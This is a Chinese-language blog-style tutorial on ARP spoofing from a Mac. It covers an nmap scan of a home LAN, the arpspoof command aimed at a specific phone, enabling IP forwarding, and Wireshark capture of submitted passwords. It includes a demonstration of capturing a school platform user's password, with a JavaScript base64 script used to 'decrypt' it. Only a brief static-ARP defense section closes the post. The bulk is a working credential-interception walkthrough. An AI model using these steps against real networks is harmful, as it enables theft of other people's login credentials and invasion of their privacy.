arp 攻击|抓取密码

(Updated: )
, , ,

People tell the world you’re crazy.

And all your protests to the contrary.

Just confirm what they’re saying.

原理

ARP协议又称地址解析协议,是网络层协议,负责将某个IP地址解析成对应的MAC地址。

一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网中传输数据的网卡却不能直接识别IP地址,所以用ARP解析协议将IP地址解析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,来查询目标设备的mac地址。

在局域网的任意一台主机中,都有一个ARP缓存表,里面保存本机已知的此局域网中各主机和路由器的IP地址和MAC地址的对照关系。

准备工作

安装 arpspoof

https://github.com/SuperMarcus/macos-arpspoof

查看局域网内主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
➜  ~ sudo nmap -sS 192.168.50.0/24
Password:
Sorry, try again.
Password:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-31 14:26 CST
Nmap scan report for R6300V2-1C95 (192.168.50.1)
Host is up (0.0013s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
53/tcp   open  domain
515/tcp  open  printer
3333/tcp open  dec-notes
8443/tcp open  https-alt
9100/tcp open  jetdirect
9998/tcp open  distinct32

Nmap scan report for HONOR_9X_PRO-ccdce95b2d6d (192.168.50.43)
Host is up (0.0067s latency).
Not shown: 999 closed ports
PORT      STATE SERVICE
16080/tcp open  osxwebadmin
MAC Address: E8:3F:67:D4:47:06 (Huawei Device)

Nmap scan report for chuangmi-plug-m3_miap61D6 (192.168.50.111)
Host is up (0.010s latency).
All 1000 scanned ports on chuangmi-plug-m3_miap61D6 (192.168.50.111) are closed

Nmap scan report for chuangmi-plug-m3_miap355E (192.168.50.133)
Host is up (0.019s latency).
All 1000 scanned ports on chuangmi-plug-m3_miap355E (192.168.50.133) are closed

Nmap scan report for Elli0ts-phone (192.168.50.166)
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT      STATE SERVICE
62078/tcp open  iphone-sync

Nmap scan report for DESKTOP-99ID8RD (192.168.50.182)
Host is up (0.0030s latency).
All 1000 scanned ports on DESKTOP-99ID8RD (192.168.50.182) are filtered

Nmap scan report for liujialdeiPhone (192.168.50.192)
Host is up (0.026s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE
16080/tcp open  osxwebadmin
62078/tcp open  iphone-sync

Nmap scan report for 192.168.50.240
Host is up (0.0015s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https

arp 欺骗

选定 ip 为166的 iphone 开始攻击

sudo arpspoof -i en0 -t 192.168.50.166 192.168.50.1

这个命令是告诉192.168.50.166这个机器,我是192.168.50.1,也就是你的网关,你的包就发给我吧,这样我就能在我的en0上监听到来自192.168.50.166的发包了

但是这样一来,192.168.1.111就断网了,因为它的包发给了我,而没能转发出去。这个时候手机上会出现一个比较奇怪的现象,就是微信能收到小伙伴的消息,但是却发不出去。实测有极少量的消息还是发送出去了,可能是由于我们的arp欺骗是持续反复进行的,中间的间隙导致了包还是发给了网管。但是无论如何,这个时候目标机器的网络连接是不正常的

ip 转发

打开ip转发功能后,就能把192.168.50.166的包转发给路由器了

1
2
3
➜  ~ sudo sysctl -w net.inet.ip.forwarding=1
Password:
net.inet.ip.forwarding: 0 -> 1

wireshark 抓包

监听 en0 网卡,设置筛选条件 ip.src == 192.168.50.166

wireshark

演示1

被攻击机提交密码

IMG_2347

攻击机抓取密码成功

wireshark

演示2

抓取某学校某学习通用户密码(前端加密🔐)

逆向解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
a256 = '',
r64 = [256],
r256 = [256],
i = 0;
 
var UTF8 = {
 
    /**
 
     * Encode multi-byte Unicode string into utf-8 multiple single-byte characters
 
     * (BMP / basic multilingual plane only)
 
     *
 
     * Chars in range U+0080 - U+07FF are encoded in 2 chars, U+0800 - U+FFFF in 3 chars
 
     *
 
     * @Param {String} strUni Unicode string to be encoded as UTF-8
 
     * @returns {String} encoded string
 
     */
    encode: function(strUni) {
        // use regular expressions & String.replace callback function for better efficiency
        // than procedural approaches
        var strUtf = strUni.replace(/[\u0080-\u07ff]/g, // U+0080 - U+07FF => 2 bytes 110yyyyy, 10zzzzzz
        function(c) {
            var cc = c.charCodeAt(0);
            return String.fromCharCode(0xc0 | cc >> 6, 0x80 | cc & 0x3f);
        }).replace(/[\u0800-\uffff]/g, // U+0800 - U+FFFF => 3 bytes 1110xxxx, 10yyyyyy, 10zzzzzz
        function(c) {
            var cc = c.charCodeAt(0);
            return String.fromCharCode(0xe0 | cc >> 12, 0x80 | cc >> 6 & 0x3F, 0x80 | cc & 0x3f);
        });
        return strUtf;
    },
 
    /**
 
     * Decode utf-8 encoded string back into multi-byte Unicode characters
 
     *
 
     * @param {String} strUtf UTF-8 string to be decoded back to Unicode
 
     * @returns {String} decoded string
 
     */
    decode: function(strUtf) {
        // note: decode 3-byte chars first as decoded 2-byte strings could appear to be 3-byte char!
        var strUni = strUtf.replace(/[\u00e0-\u00ef][\u0080-\u00bf][\u0080-\u00bf]/g, // 3-byte chars
        function(c) { // (note parentheses for precence)
            var cc = ((c.charCodeAt(0) & 0x0f) << 12) | ((c.charCodeAt(1) & 0x3f) << 6) | (c.charCodeAt(2) & 0x3f);
            return String.fromCharCode(cc);
        }).replace(/[\u00c0-\u00df][\u0080-\u00bf]/g, // 2-byte chars
        function(c) { // (note parentheses for precence)
            var cc = (c.charCodeAt(0) & 0x1f) << 6 | c.charCodeAt(1) & 0x3f;
            return String.fromCharCode(cc);
        });
        return strUni;
    }
};
 
while (i < 256) {
    var c = String.fromCharCode(i);
    a256 += c;
    r256[i] = i;
    r64[i] = b64.indexOf(c); ++i;
}
 
function code(s, discard, alpha, beta, w1, w2) {
    s = String(s);
    var buffer = 0,
    i = 0,
    length = s.length,
    result = '',
    bitsInBuffer = 0;
 
    while (i < length) {
        var c = s.charCodeAt(i);
        c = c < 256 ? alpha[c] : -1;
 
        buffer = (buffer << w1) + c;
        bitsInBuffer += w1;
 
        while (bitsInBuffer >= w2) {
            bitsInBuffer -= w2;
            var tmp = buffer >> bitsInBuffer;
            result += beta.charAt(tmp);
            buffer ^= tmp << bitsInBuffer;
        }++i;
    }
    if (!discard && bitsInBuffer > 0) result += beta.charAt(buffer << (w2 - bitsInBuffer));
    return result;
}
 
var Plugin = function(dir, input, encode) {
    return input ? Plugin[dir](input, encode) : dir ? null: this;
};
 
Plugin.btoa = Plugin.encode = function(plain, utf8encode) {
    plain = Plugin.raw === false || Plugin.utf8encode || utf8encode ? UTF8.encode(plain) : plain;
    plain = code(plain, false, r256, b64, 8, 6);
    return plain + '===='.slice((plain.length % 4) || 4);
};
 
Plugin.atob = Plugin.decode = function(coded, utf8decode) {
    coded = coded.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    coded = String(coded).split('=');
    var i = coded.length;
    do {--i;
        coded[i] = code(coded[i], true, r64, a256, 6, 8);
    } while ( i > 0 );
    coded = coded.join('');
    return Plugin.raw === false || Plugin.utf8decode || utf8decode ? UTF8.decode(coded) : coded;
};
 
function getPwd(p)
{ //p就是传来的密码
return Plugin.btoa(p,"UTF-8");
}
function reversePwd(p)
{
	return Plugin.atob(p,"UTF-8");
}

image-20201103182026551

同样的流程抓取流量,然后解密password

1
fid=2**4&uname=189****6699&password=*********

防御

启用双向绑定:本机上绑定网关 mac 地址;网关上绑定本机 mac 地址。

1
sudo arp -s 192.168.3.1 00:11:11:11:11:11

其中 192.168.3.1 填你所在网络环境的网关 IP,后面的 12 个数字是网关的 MAC 地址,这样普通的伪装网关攻击就没什么用了。这条命令是永久性的,你可以输入 arp -d 192.168.3.1 来删除前面绑定的网关 MAC 地址。

Link

Macos进行局域网arp欺骗

https://www.jianshu.com/p/359ceeaf1395

https://www.52pojie.cn/forum.php?mod=viewthread&tid=1266540

https://blog.csdn.net/jiandongway009/article/details/84011974

https://www.zhihu.com/question/39367879/answer/272391307